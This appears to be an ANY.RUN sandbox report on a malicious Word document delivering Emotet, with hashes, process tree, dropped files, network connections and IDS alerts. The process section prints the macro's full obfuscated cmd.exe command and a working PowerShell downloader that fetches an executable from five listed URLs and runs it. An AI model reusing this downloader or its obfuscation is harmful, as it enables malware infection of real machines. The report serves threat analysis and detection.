analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

BIZ _6UYJSOGBL.doc

Full analysis: https://app.any.run/tasks/9fdb774a-c277-4238-a5eb-8838edf29ff4
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: November 15, 2018, 07:02:02
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet
loader
trojan
feodo
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Nov 14 17:27:00 2018, Last Saved Time/Date: Wed Nov 14 17:27:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0
MD5:

2F87B85F9F95F75164DDB9E9BBF21F98

SHA1:

F09EE611EA177E7632C0E71CBF462743BFC514E7

SHA256:

8DA41375A30DF048A5343CFC74C957D1FC3158C566D78E46DF0DA066A4C279D4

SSDEEP:

1536:+WzqUocn1kp59gxBK85fBt+a9Jx3GxdxoRlBsRghIxgBqx5xfxEBoxtBBB4xWDP:9M41k/W48DxuxoRlBsRghIxgBqx5xfx9

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3196)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3196)
    • Application was dropped or rewritten from another process

      • Kji.exe (PID: 3832)
      • lpiograd.exe (PID: 1412)
      • Kji.exe (PID: 3100)
      • lpiograd.exe (PID: 2948)
    • Emotet process was detected

      • lpiograd.exe (PID: 1412)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 1428)
    • Connects to CnC server

      • lpiograd.exe (PID: 2948)
    • EMOTET was detected

      • lpiograd.exe (PID: 2948)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 1428)
    • Executes PowerShell scripts

      • cmd.exe (PID: 4032)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 1428)
      • Kji.exe (PID: 3100)
    • Reads Internet Cache Settings

      • powershell.exe (PID: 1428)
    • Starts itself from another location

      • Kji.exe (PID: 3100)
    • Application launched itself

      • lpiograd.exe (PID: 1412)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3196)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3196)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: -
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2018:11:14 17:27:00
ModifyDate: 2018:11:14 17:27:00
Pages: 1
Words: 2
Characters: 13
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 14
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
7
Malicious processes
7
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs cmd.exe no specs powershell.exe kji.exe no specs kji.exe #EMOTET lpiograd.exe no specs #EMOTET lpiograd.exe

Process information

PID
CMD
Path
Indicators
Parent process
3196"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\BIZ _6UYJSOGBL.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
4032c:\wvBQHldjVqOM\YYZXLbOZn\HFAKEUwmzJ\..\..\..\windows\system32\cmd.exe /C"s^e^t ^[-^.=^'O^p^s';$n^Bf^='^htt&&set \^+?^.=^an^e^lapr&&^s^e^t ^#^,^$@=^.^P^at&&^s^e^t '^~=ervi&&s^e^t +^.=^w-Ob^j^ect&&^se^t ^#}^_=e^ll^ ^$z^Zo^=&&s^e^t ^[,*^+=n^t^s&&s^e^t '^`^.=^e&&^se^t ^;^]'^+=^8^@&&^s^et ^#`=^B&&^se^t ^}^`?=^h&&^se^t ^]^_\^*=^T&&^s^et '^\^@=N^Th.^t^yp&&s^e^t ^}`=^://^a^ion&&^s^e^t ^_^`~=^ow^er^s^h&&s^e^t {^]^'\=^.^s^en&&^s^e^t ^~^+=)^;$L^Ai^ ^=N^e&&^se^t ^*`^$=k^e^m^a^ler^k^o^l.net&&set ^-#=jZU);^Start&&s^e^t ^~^$^*=^h&&s^e^t ^-*^'=ht^tp^';$N^T^h^ &&^s^et ^]#^?=^om 'ad^o^d^b.^strea^m^'^;f&&s^e^t ^{^*^`}=n&&^s^e^t ^$.^*^}=v^e&&s^e^t ^@,^`=^.&&^se^t ^[+@^-=^$n&&se^t ?^.,^_=(^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&se^t $^.=^:/&&^se^t ;^?[^#=/n&&s^e^t ^*[^{^#=^m^ana&&^se^t #^{=n^t/&&^s^et ^,]^~=^o&&^se^t ,^?=^=^ Ne&&^s^et *^?,^\=^.^op&&s^e^t @^\^{=^b0^kQ^7&&^se^t ~^\=c^es&&^s^et ^#^]=^p&&^s^e^t #^.^-^'=^T'^,$Lr^G&&^s^e^t $^{`^@=Q&&^se^t `^]^*~=^p^://^zh^an&&^s^et ^.^3bb5484c-acd3-5883-ae5d-000aa204eed3
}=g^jia^b^ir^dn^e^s&&s^e^t .{-=^h^{&&s^e^t ^#^$^.@=^ ^ ^ ^ &&^se^t ]^-@^[=on^s^eB&&^se^t ^#^?=/&&^s^et ^+^{^\=^e ^=^ 1;f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&s^e^t ^,^`=com/w^p-c^o&&^se^t .^-=c&&^s^e^t ^\-^@=^ ^-c&&s^e^t ^$^-^+=N&&^s^et ^-*=^i.&&^se^t ^{^+^?^]=n^t^e&&^s^et *^-=^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&^s^e^t ^@^-=^od^y)^;&&s^e^t ^+~^.=^d()^;^$N^Th&&s^e^t ^]}=^x^e'&&set \^]^'=^;$L^Ai&&^s^et ^~^#^@^'=^Obj^ec^t&&^s^e^t ^_^}'?=r&&^s^et @^[^,=r^each(f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&s^e^t ^$[*^`=()^;&&^se^t ^{~^*=^f)&&^s^e^t ^[^;^#=w^-&&^s^e^t ^,^\{=to^f^i^le&&^se^t '^*=^et^a^.&&^se^t ~^?^]^[=^ ^ &&^s^e^t #^+^*=^h^t^t^p:&&s^e^t ^'^.^#^?='^G^E&&^s^et ^]^`_^@=^$NT^h^.s^a&&^s^et ^{^}=^,0&&se^t ^$^~^[-=r^eak^}&&^s^e^t ^~\^?^}=c&&^s^et ^#^$^,=^y{^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&s^e^t ^}^?~^[=co/P^U^x^AY&&^s^e^t ^-^,}^.=-^P&&^se^t @^`=^wr^i^t^e(^$^L^Ai^.r&&^s^e^t ^{^.-=)&&^s^e^t ^,.=^}}^ ^ ^ ^ &&se^t ^~^+^?=^m^@^h^ttp&&^s^e^t ^[_=^.&&^s^e^t {^*=()+^'^\^Kj&&s^e^t @^~=u^p&&s^e^t ^~^_=@')&&^s^et [^}^.=^p^j^x^u'.Sp^l^it(^'&&^se^t ;^[=roc^e^s^s ^$^j^ZU;b&&^s^e^t ;^\^`^*=^h]&&^s^et ^\^-_=^a^tc&&s^e^t ^,}=^L^A&&s^e^t }^\]^[=^e^sp&&s^e^t {^+`=^[S^y^st^e^m.^IO&&^s^e^t ^[^?=^Lr^G ^in^ &&set ^$^@^[=l^o^a^ds/&&^s^e^t \^{^?_=^e&&s^e^t #^.^?=o^m^.^br&&^s^e^t ^+^@^,^.=l^2^.^x^ml&&^s^et ^*^}=^{^t&&^s^e^t '^\^?=t^.&&^s^e^t ^*.=@^ht^t^p://^p&&^s^et ^].=^ ^-c^o^m 'm^s^x^m&&^se^t ^?^~*=;^$j^Z^U^=(&&^se^t ^{?=^i.^o^p^e&&^se^t ^+^*=^:^:^G^et&&s^et [^~#^`=n(&&^se^t ^.^?^]=^Te^mpPa^t&&^se^t ^?^+$=^Y&&^s^e^t ^.}=/&&^s^et ^`^};-=^g^em^e&&s^e^t ^'{=//s^i^tran^t^or.^e^s/^L^d^Lr^6F^8^A@htt^p&&c^al^l ^s^e^t \[?=%^#^]%%^_^`~%%^#}^_%%^[-^.%%`^]^*~%%^.^3bb5484c-acd3-5883-ae5d-000aa204eed3
}%%'^\^?%%^}^?~^[%%^*.%%\^+?^.%%'^*%%.^-%%#^.^?%%^#^?%%@^\^{%%$^{`^@%%^;^]'^+%%#^+^*%%^'{%%^}`%%^*[^{^#%%^`^};-%%^[,*^+%%'^~%%~^\%%^@,^`%%^,^`%%^{^+^?^]%%#^{%%@^~%%^$^@^[%%^~^+^?%%$^.%%^.}%%^*`^$%%;^?[^#%%^?^+$%%[^}^.%%^~^_%%^?^~*%%{^+`%%^#^,^$@%%;^\^`^*%%^+^*%%^.^?^]%%^}^`?%%{^*%%^-*%%'^`^.%%^]}%%^~^+%%^[^;^#%%^~^#^@^'%%^].%%^+^@^,^.%%^-*^'%%,^?%%+^.%%^\-^@%%^]#^?%%^,]^~%%@^[^,%%^[^?%%^[+@^-%%^#`%%^{~^*%%^*^}%%^_^}'?%%^#^$^,%%^,}%%^{?%%[^~#^`%%^'^.^#^?%%#^.^-^'%%^{^}%%^{^.-%%\^]^'%%{^]^'\%%^+~^.%%*^?,^\%%\^{^?_%%^{^*^`}%%^$[*^`%%*^-%%'^\^@%%^+^{^\%%^$^-^+%%^]^_\^*%%^~^$^*%%^[_%%@^`%%}^\]^[%%]^-@^[%%^@^-%%^]^`_^@%%^$.^*^}%%^,^\{%%?^.,^_%%^-#%%^-^,}^.%%;^[%%^$^~^[-%%^~\^?^}%%^\^-_%%.{-%%^,.%%~^?^]^[%%^#^$^.@%&&ca^ll %\[?%"
c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1428powershell $zZo='Ops';$nBf='http://zhangjiabirdnest.co/PUxAY@http://panelapreta.com.br/b0kQ7Q8@http://sitrantor.es/LdLr6F8A@http://aionmanagementservices.com/wp-content/uploads/m@http://kemalerkol.net/nYpjxu'.Split('@');$jZU=([System.IO.Path]::GetTempPath()+'\Kji.exe');$LAi =New-Object -com 'msxml2.xmlhttp';$NTh = New-Object -com 'adodb.stream';foreach($LrG in $nBf){try{$LAi.open('GET',$LrG,0);$LAi.send();$NTh.open();$NTh.type = 1;$NTh.write($LAi.responseBody);$NTh.savetofile($jZU);Start-Process $jZU;break}catch{}} C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3832"C:\Users\admin\AppData\Local\Temp\Kji.exe" C:\Users\admin\AppData\Local\Temp\Kji.exepowershell.exe
User:
admin
Company:
PeebSoft / Sun Microsystems, Inc.
Integrity Level:
MEDIUM
Description:
RT21635 DBIN
Exit code:
0
Version:
1, 4, 2, 50
3100"C:\Users\admin\AppData\Local\Temp\Kji.exe"C:\Users\admin\AppData\Local\Temp\Kji.exe
Kji.exe
User:
admin
Company:
PeebSoft / Sun Microsystems, Inc.
Integrity Level:
MEDIUM
Description:
RT21635 DBIN
Exit code:
0
Version:
1, 4, 2, 50
1412"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
Kji.exe
User:
admin
Company:
PeebSoft / Sun Microsystems, Inc.
Integrity Level:
MEDIUM
Description:
RT21635 DBIN
Exit code:
0
Version:
1, 4, 2, 50
2948"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
lpiograd.exe
User:
admin
Company:
PeebSoft / Sun Microsystems, Inc.
Integrity Level:
MEDIUM
Description:
RT21635 DBIN
Version:
1, 4, 2, 50
Total events
1 691
Read events
1 276
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
3

Dropped files

PID
Process
Filename
Type
3196WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR99F3.tmp.cvr
MD5:
SHA256:
1428powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LXRC1F8XFUXY027ML4OX.temp
MD5:
SHA256:
1428powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:0C5E84CFB7FDA503A7F95914AD626D14
SHA256:847C9A54D0A166FB3A44DD4F6C901834D114B86EF68D6E5A7AAA494B6569B01D
1428powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF16a240.TMPbinary
MD5:0C5E84CFB7FDA503A7F95914AD626D14
SHA256:847C9A54D0A166FB3A44DD4F6C901834D114B86EF68D6E5A7AAA494B6569B01D
3196WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:EC564778416A9044826F739AD10375CF
SHA256:CC3266B071933269ACC13E96D4F790189AC068B788BBA7F86EF90B7FBF4EB723
3196WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$Z _6UYJSOGBL.docpgc
MD5:B6095D39DB0CE619DE0333CB216198CB
SHA256:B81B3FE356C89291119E59F776108AE943552AA1EAE1BB25B9A9F141FAF5C4FD
1428powershell.exeC:\Users\admin\AppData\Local\Temp\Kji.exeexecutable
MD5:317D5E759948DBBE979BB6D6E9C2676E
SHA256:FDDA316E38CE6F1719183EDAD2E3C8BCE5168E24411176B550B16B0A4064B215
3100Kji.exeC:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exeexecutable
MD5:317D5E759948DBBE979BB6D6E9C2676E
SHA256:FDDA316E38CE6F1719183EDAD2E3C8BCE5168E24411176B550B16B0A4064B215
1428powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\IETldCache\index.datdat
MD5:D7A950FEFD60DBAA01DF2D85FEFB3862
SHA256:75D0B1743F61B76A35B1FEDD32378837805DE58D79FA950CB6E8164BFA72073A
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
3
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2948
lpiograd.exe
GET
83.110.100.209:443
http://83.110.100.209:443/
AE
malicious
1428
powershell.exe
GET
200
75.98.168.239:80
http://zhangjiabirdnest.co/PUxAY/
US
executable
148 Kb
suspicious
1428
powershell.exe
GET
301
75.98.168.239:80
http://zhangjiabirdnest.co/PUxAY
US
html
241 b
suspicious
2948
lpiograd.exe
GET
68.102.169.43:8080
http://68.102.169.43:8080/
US
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2948
lpiograd.exe
83.110.100.209:443
Emirates Telecommunications Corporation
AE
malicious
1428
powershell.exe
75.98.168.239:80
zhangjiabirdnest.co
A2 Hosting, Inc.
US
suspicious
2948
lpiograd.exe
68.102.169.43:8080
Cox Communications Inc.
US
malicious

DNS requests

Domain
IP
Reputation
zhangjiabirdnest.co
  • 75.98.168.239
suspicious

Threats

PID
Process
Class
Message
1428
powershell.exe
A Network Trojan was detected
ET POLICY Terse Named Filename EXE Download - Possibly Hostile
1428
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
1428
powershell.exe
A Network Trojan was detected
ET CURRENT_EVENTS Likely Evil EXE download from MSXMLHTTP non-exe extension M2
1428
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
2948
lpiograd.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
2948
lpiograd.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
2 ETPRO signatures available at the full report
No debug info